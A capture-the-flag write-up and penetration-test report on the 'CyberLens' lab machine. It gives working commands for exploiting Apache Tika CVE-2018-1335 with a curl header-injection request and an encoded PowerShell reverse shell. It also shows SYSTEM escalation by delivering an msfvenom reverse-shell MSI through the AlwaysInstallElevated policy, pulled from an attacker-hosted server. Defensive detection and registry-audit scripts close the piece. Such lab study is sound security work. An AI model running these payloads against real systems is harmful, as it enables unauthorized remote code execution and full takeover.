
CyberLens

export TARGET_IP=10.10.195.124
sudo nano /etc/hosts # Add: $TARGET_IP cyberlens.thm
nmap -p- --min-rate 5000 $TARGET_IP
Not shown: 65417 closed tcp ports (reset), 101 filtered tcp ports (no-response)
PORT STATE SERVICE
80/tcp open http
135/tcp open msrpc
139/tcp open netbios-ssn
445/tcp open microsoft-ds
3389/tcp open ms-wbt-server
5985/tcp open wsman
7680/tcp open pando-pub
47001/tcp open winrm
49664/tcp open unknown
49665/tcp open unknown
49666/tcp open unknown
49667/tcp open unknown
49668/tcp open unknown
49669/tcp open unknown
49671/tcp open unknown
49676/tcp open unknown
61777/tcp open unknown

At http://cyberlens.thm/about.html we find "CyberLens Image Extractor", a metadata extractor. Inspecting the request with Burp Suite, we find the endpoint on port 61777, which is probably responsible for the metadata extraction.

PUT /meta HTTP/1.1
Host: cyberlens.thm:61777

Going to http://cyberlens.thm:61777 we find "Apache Tika 1.17 Server". From Apache Tika versions 1.7 to 1.17, clients could send carefully crafted headers to tika-server that could be used to inject commands into the command line of the server running tika-server (CVE-2018-1335).

nc -lvnp 6666
git clone https://github.com/canumay/cve-2018-1335
cd cve-2018-1335
python3 exploit.py $TARGET_IP 61777 "powershell -e [BASE64_ENCODED_PAYLOAD]"

You can also do it manually:

curl -X PUT http://cyberlens.thm:61777/meta \
-H "X-Tika-OCRTesseractPath: \"cscript\"" \
-H "X-Tika-OCRLanguage: //E:Jscript" \
-H "Expect: 100-continue" \
-H "Content-type: image/jp2" \
-H "Connection: close" \
-d "var oShell = WScript.CreateObject(\"WScript.Shell\"); var oExec = oShell.Exec('cmd /c powershell -e [BASE64_ENCODED_PAYLOAD]');"

Or using Metasploit, whatever.

I used PowerShell #3 (Base64) from https://www.revshells.com/.

So we are in.

whoami # cyberlens\cyberlens
Get-MpComputerStatus # Check if any protection, like antivirus or Windows Defender, is up and running.

Neither of the protection mechanisms is enabled or running.

Download PrivescCheck.ps1 (https://github.com/itm4n/PrivescCheck) from the Attacker Machine:

Attacker Machine
# Inside the directory where PrivescCheck.ps1 is:
python3 -m http.server 80
Target Machine
curl http://10.2.17.44:80/PrivescCheck.ps1 -o PrivescCheck.ps1
. .\PrivescCheck.ps1; Invoke-PrivescCheck

We see that AlwaysInstallElevated might be enabled. If AlwaysInstallElevated is enabled on a target, any user can install a Windows Installer (MSI) package that runs in the context of the local SYSTEM account, so we can exploit it by crafting our own malicious MSI file.

Once created, we can download and execute the malicious file on the victim as ANY user, and it will run under the context of the local SYSTEM account. This means that by placing malicious shell code in an MSI file, we are able to obtain a reverse shell as SYSTEM.

CATEGORY : TA0004 - Privilege Escalation
NAME     : AlwaysInstallElevated
TYPE     : Base

Check whether the 'AlwaysInstallElevated' policy is enabled
system-wide and for the current user. If so, the current
user may install a Windows Installer package with elevated
(SYSTEM) privileges.

LocalMachineKey : HKLM\SOFTWARE\Policies\Microsoft\Windows\Installer
LocalMachineValue : AlwaysInstallElevated
LocalMachineData : 1
CurrentUserKey : HKCU\SOFTWARE\Policies\Microsoft\Windows\Installer
CurrentUserValue : AlwaysInstallElevated
CurrentUserData : 1
Description : AlwaysInstallElevated is enabled in both HKLM and HKCU.

[*] Status: Vulnerable - Severity: High - Execution time: 00:00:00.008

We craft a simple Windows reverse shell via msfvenom in the file format of an MSI.

msfvenom -p windows/x64/shell_reverse_tcp LHOST=10.2.17.44 LPORT=8888 -a x64 --platform Windows -f msi -o rev.msi
nc -lvnp 8888
Attacker Machine
python3 -m http.server 80
Target Machine
curl http://10.2.17.44:80/rev.msi -o rev.msi
.\rev.msi
Listening port 8888
whoami # nt authority\system
cd C:\Users\Administrator\Desktop
type admin.txt

This report details the findings of a penetration test conducted against the target system "CyberLens." The assessment revealed a critical vulnerability (CVE-2018-1335) in Apache Tika, a component of the target's web application. This vulnerability allowed for remote code execution (RCE), leading to an initial foothold on the system. Further investigation revealed a privilege escalation vulnerability through the "AlwaysInstallElevated" Windows policy, ultimately granting SYSTEM-level access to the target machine.

Phase 1: Reconnaissance and Enumeration

1.1. Hostname Resolution

The target IP address was identified as 10.10.195.124. To facilitate access, the /etc/hosts file on the attacking machine was modified to map the hostname cyberlens.thm to the target IP:

export TARGET_IP=10.10.195.124
sudo nano /etc/hosts # Add: $TARGET_IP cyberlens.thm

Explanation: The /etc/hosts file is used for local hostname resolution. This entry allows us to use the user-friendly name cyberlens.thm instead of the IP address throughout the penetration test.

1.2. Port Scanning

A comprehensive port scan was performed using nmap to identify open ports and running services:

nmap -p- --min-rate 5000 $TARGET_IP

Results:

PORT      STATE SERVICE
80/tcp open http
135/tcp open msrpc
139/tcp open netbios-ssn
445/tcp open microsoft-ds
3389/tcp open ms-wbt-server
5985/tcp open wsman
7680/tcp open pando-pub
47001/tcp open winrm
49664/tcp open unknown
49665/tcp open unknown
49666/tcp open unknown
49667/tcp open unknown
49668/tcp open unknown
49669/tcp open unknown
49671/tcp open unknown
49676/tcp open unknown
61777/tcp open unknown

Phase 2: Vulnerability Analysis and Exploitation

2.1. Web Application Analysis

Browsing to http://cyberlens.thm revealed a website with an "About" page (http://cyberlens.thm/about.html) mentioning "CyberLens Image Extractor," a metadata extraction tool.

Using Burp Suite to intercept the HTTP requests, we observed a PUT request to /meta on port 61777 when interacting with the image extractor:

PUT /meta HTTP/1.1
Host: cyberlens.thm:61777

Explanation: Burp Suite is a web application security testing tool that allows us to intercept, inspect, and modify HTTP traffic. This PUT request indicates that the metadata extraction functionality likely resides on the unusual port 61777.

2.2. Apache Tika Vulnerability (CVE-2018-1335)

Navigating to http://cyberlens.thm:61777 displayed "Apache Tika 1.17 Server." Research revealed that Apache Tika versions 1.7 to 1.17 are vulnerable to command injection (CVE-2018-1335).

Exploitation:

  1. Reverse Shell Setup: A netcat listener was started on the attacking machine to receive the reverse shell connection:

    nc -lvnp 6666
  2. Exploit Execution: The cve-2018-1335 exploit from GitHub was used. This exploit leverages the vulnerability to execute arbitrary commands on the target system. The command executes a base64-encoded PowerShell reverse shell (PowerShell #3 (Base64) from https://www.revshells.com/).

    git clone https://github.com/canumay/cve-2018-1335
    cd cve-2018-1335
    python3 exploit.py $TARGET_IP 61777 "powershell -e [BASE64_ENCODED_PAYLOAD]"

    This establishes a reverse shell, giving the attacker command-line access to the target machine.

  3. Manual Exploitation (Alternative): The vulnerability can also be exploited manually using curl:

    curl -X PUT http://cyberlens.thm:61777/meta \
    -H "X-Tika-OCRTesseractPath: \"cscript\"" \
    -H "X-Tika-OCRLanguage: //E:Jscript" \
    -H "Expect: 100-continue" \
    -H "Content-type: image/jp2" \
    -H "Connection: close" \
    -d "var oShell = WScript.CreateObject(\"WScript.Shell\"); var oExec = oShell.Exec('cmd /c powershell -e [BASE64_ENCODED_PAYLOAD]');"

    Explanation: This curl command sends a crafted HTTP PUT request whose headers exploit the Tika vulnerability:

    • X-Tika-OCRTesseractPath and X-Tika-OCRLanguage: tika-server takes the Tesseract path header as the OCR executable to launch and passes the language header to it as an argument, so these headers are manipulated to inject the command.
    • Content-type: This header should be image related, according to the vulnerability specification, so that Tika routes the request through its OCR parser.

    This is a manual demonstration of how the exploit works, bypassing the need for the Python script.

  4. Reverse Shell Payload Generation (Example): Websites like https://www.revshells.com/ can be used to generate various reverse shell payloads. The PowerShell #3 (Base64) option provides a convenient, encoded payload. It's crucial to use reliable sources and understand the payload you are using.
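From the defender's side, the injection described above leaves a distinctive trace on the host: the tika-server Java process spawning a script host or shell. The following PowerShell function is an added example, not part of the original write-up, that applies that rule to process-creation records shaped like Sysmon Event ID 1 (ParentImage, ParentCommandLine, Image, CommandLine); the records it runs over are constructed samples and the file paths in them are assumptions.

```powershell
# Added example (not from the original write-up). Flags process-creation records
# where a tika-server Java process spawned a script host or shell, the pattern the
# X-Tika-OCRTesseractPath injection produces. Field names follow Sysmon Event ID 1;
# the records below are constructed samples and their file paths are assumptions.

$ScriptHostsAndShells = @('cscript.exe', 'wscript.exe', 'cmd.exe', 'powershell.exe', 'pwsh.exe')

function Test-TikaSuspiciousChild {
    param([Parameter(Mandatory)][object[]]$Events)

    foreach ($e in $Events) {
        # Parent must be java/javaw running tika-server; child must be a script host or shell.
        $parentIsTika = ($e.ParentImage -match '\\javaw?\.exe$') -and
                        ($e.ParentCommandLine -match 'tika-server')
        $childName    = (($e.Image -split '\\')[-1]).ToLower()
        if ($parentIsTika -and ($ScriptHostsAndShells -contains $childName)) {
            [pscustomobject]@{
                UtcTime     = $e.UtcTime
                Parent      = $e.ParentImage
                Child       = $e.Image
                CommandLine = $e.CommandLine
                Reason      = 'tika-server spawned a script host/shell (CVE-2018-1335 pattern)'
            }
        }
    }
}

# Constructed samples: a legitimate OCR child (tesseract), an injected cscript child,
# and an unrelated cmd.exe launched from Explorer. Only the second should be reported.
$SampleEvents = @(
    [pscustomobject]@{ UtcTime = '2024-01-01 10:00:00'
        ParentImage = 'C:\Program Files\Java\bin\java.exe'
        ParentCommandLine = 'java -jar tika-server-1.17.jar -p 61777'
        Image = 'C:\Program Files\Tesseract-OCR\tesseract.exe'
        CommandLine = 'tesseract C:\Temp\upload.png C:\Temp\upload -l eng' },
    [pscustomobject]@{ UtcTime = '2024-01-01 10:00:05'
        ParentImage = 'C:\Program Files\Java\bin\java.exe'
        ParentCommandLine = 'java -jar tika-server-1.17.jar -p 61777'
        Image = 'C:\Windows\System32\cscript.exe'
        CommandLine = 'cscript //E:Jscript C:\Temp\upload.tmp' },
    [pscustomobject]@{ UtcTime = '2024-01-01 10:01:00'
        ParentImage = 'C:\Windows\explorer.exe'
        ParentCommandLine = 'explorer.exe'
        Image = 'C:\Windows\System32\cmd.exe'
        CommandLine = 'cmd.exe' }
)

Test-TikaSuspiciousChild -Events $SampleEvents | Format-Table -AutoSize
```

On a real host the records come from Get-WinEvent -FilterHashtable @{LogName='Microsoft-Windows-Sysmon/Operational'; Id=1}, mapping the event's data fields to the same property names.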

Phase 3: Privilege Escalation

3.1. Initial Foothold and System Enumeration

After successful exploitation, we gained a reverse shell as the cyberlens\cyberlens user:

whoami  # Output: cyberlens\cyberlens

Initial system checks were performed:

Get-MpComputerStatus  # Check Windows Defender status

Explanation: Get-MpComputerStatus checks the status of Windows Defender. This is important to understand the security posture of the system and anticipate potential obstacles. In this case, it was found to be disabled, simplifying the escalation process.

3.2. Automated Privilege Escalation Checks

The PrivescCheck.ps1 script was used to identify potential privilege escalation vectors. The script checks for a variety of common misconfigurations and vulnerabilities.

Attacker Machine
# Inside the directory where PrivescCheck.ps1 is:
python3 -m http.server 80 # Host a simple HTTP server
Target Machine
curl http://[ATTACKER_IP]:80/PrivescCheck.ps1 -o PrivescCheck.ps1
. .\PrivescCheck.ps1; Invoke-PrivescCheck # Load and run the script

Explanation:

  • curl ... -o ...: Downloads the script from the attacker's web server.
  • . .\PrivescCheck.ps1: The dot-sourcing operator (.) executes the script in the current scope, making its functions available.
  • Invoke-PrivescCheck: This is the main function of the script that performs the checks.

3.3. AlwaysInstallElevated Vulnerability

PrivescCheck.ps1 identified the AlwaysInstallElevated policy as being enabled:

CATEGORY : TA0004 - Privilege Escalation
NAME     : AlwaysInstallElevated
TYPE     : Base

Check whether the 'AlwaysInstallElevated' policy is enabled
system-wide and for the current user. If so, the current
user may install a Windows Installer package with elevated
(SYSTEM) privileges.

LocalMachineKey : HKLM\SOFTWARE\Policies\Microsoft\Windows\Installer
LocalMachineValue : AlwaysInstallElevated
LocalMachineData : 1
CurrentUserKey : HKCU\SOFTWARE\Policies\Microsoft\Windows\Installer
CurrentUserValue : AlwaysInstallElevated
CurrentUserData : 1
Description : AlwaysInstallElevated is enabled in both HKLM and HKCU.

[*] Status: Vulnerable - Severity: High - Execution time: 00:00:00.008

Explanation: AlwaysInstallElevated is a Windows Installer policy that, when enabled in both the HKLM and HKCU hives, allows any user to install MSI (Microsoft Installer) packages with SYSTEM-level privileges. This is a significant security risk because it bypasses normal user access controls. The AlwaysInstallElevated values under HKLM\SOFTWARE\Policies\Microsoft\Windows\Installer and HKCU\SOFTWARE\Policies\Microsoft\Windows\Installer control this policy.

3.4. MSI-Based Privilege Escalation

  1. Crafting a Malicious MSI: msfvenom was used to create an MSI package containing a reverse shell payload:

    msfvenom -p windows/x64/shell_reverse_tcp LHOST=[ATTACKER_IP] LPORT=8888 -a x64 --platform Windows -f msi -o rev.msi

    Explanation:

    • -p windows/x64/shell_reverse_tcp: Specifies a 64-bit Windows reverse shell payload.
    • LHOST=[ATTACKER_IP]: Sets the attacker's IP address for the reverse shell connection.
    • LPORT=8888: Sets the port for the reverse shell connection.
    • -a x64: Specifies the architecture (64-bit).
    • --platform Windows: Specifies the target operating system.
    • -f msi: Specifies the output format as an MSI package.
    • -o rev.msi: Sets the output file name.
  2. Hosting the MSI: The attacker's machine hosted the malicious MSI file:

    python3 -m http.server 80
  3. Downloading and Executing the MSI: The MSI was downloaded and executed on the target machine:

    Target Machine
    curl http://[ATTACKER_IP]:80/rev.msi -o rev.msi
    .\rev.msi
  4. Receiving the SYSTEM Shell: A netcat listener was set up on the attacker's machine to receive the elevated reverse shell:

    nc -lvnp 8888
  5. Verification: Once the connection was established, the whoami command confirmed SYSTEM-level access:

    Listening port 8888
    whoami  # Output: nt authority\system
  6. Accessing Sensitive Data: With SYSTEM privileges, the administrator's files could be accessed:

    cd C:\Users\Administrator\Desktop
    type admin.txt

Recommendations

  1. Patch Apache Tika: Immediately update Apache Tika to a version that is not vulnerable to CVE-2018-1335 (version 1.18 or later).
  2. Disable AlwaysInstallElevated: Disable the "AlwaysInstallElevated" policy in both the HKLM and HKCU registry hives. This is a critical security best practice.
  3. Enable Windows Defender: Ensure that Windows Defender (or a suitable alternative antivirus/endpoint protection solution) is enabled and up-to-date.
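To verify recommendation 2 (the same policy PrivescCheck flagged in 3.3 and in the notes at the top), the following PowerShell audit is an added example, not part of the original write-up or of PrivescCheck: it reads AlwaysInstallElevated from both hives, reports the effective state, and with -Remediate sets both values to 0.

```powershell
# Added example (not part of the original write-up or of PrivescCheck). Audits the
# AlwaysInstallElevated policy in both hives and can set both values to 0. Windows
# Installer elevates only when the value is 1 under BOTH HKLM and HKCU, so a missing
# value or 0 on either side means the policy is not in effect.

$InstallerPolicyKeys = @(
    'HKLM:\SOFTWARE\Policies\Microsoft\Windows\Installer',
    'HKCU:\SOFTWARE\Policies\Microsoft\Windows\Installer'
)

function Get-AlwaysInstallElevatedValue {
    param([Parameter(Mandatory)][string]$Key)
    # A missing key or value is read as 0 (policy not configured).
    $item = Get-ItemProperty -Path $Key -Name AlwaysInstallElevated -ErrorAction SilentlyContinue
    if ($null -eq $item) { return 0 }
    return [int]$item.AlwaysInstallElevated
}

function Test-AlwaysInstallElevated {
    param([switch]$Remediate)

    $values = @{}
    foreach ($key in $InstallerPolicyKeys) { $values[$key] = Get-AlwaysInstallElevatedValue -Key $key }
    # The policy is effective only when every hive reports 1.
    $effective = @($values.Values | Where-Object { $_ -ne 1 }).Count -eq 0

    foreach ($key in $InstallerPolicyKeys) {
        [pscustomobject]@{ Key = $key; AlwaysInstallElevated = $values[$key] }
    }
    [pscustomobject]@{ Key = 'Effective (both hives = 1)'; AlwaysInstallElevated = [int]$effective }

    if ($Remediate) {
        foreach ($key in $InstallerPolicyKeys) {
            if ($values[$key] -eq 1) {
                # Set 0 rather than delete so the policy is explicitly disabled. If the value
                # is delivered by Group Policy, fix the GPO too or it returns at the next refresh.
                Set-ItemProperty -Path $key -Name AlwaysInstallElevated -Value 0 -Type DWord
            }
        }
    }
}

# Audit only; add -Remediate from an elevated prompt to disable the policy.
Test-AlwaysInstallElevated | Format-Table -AutoSize
```

The HKCU check and remediation cover only the user running the script; other users' hives need to be checked separately or through the GPO that sets the value.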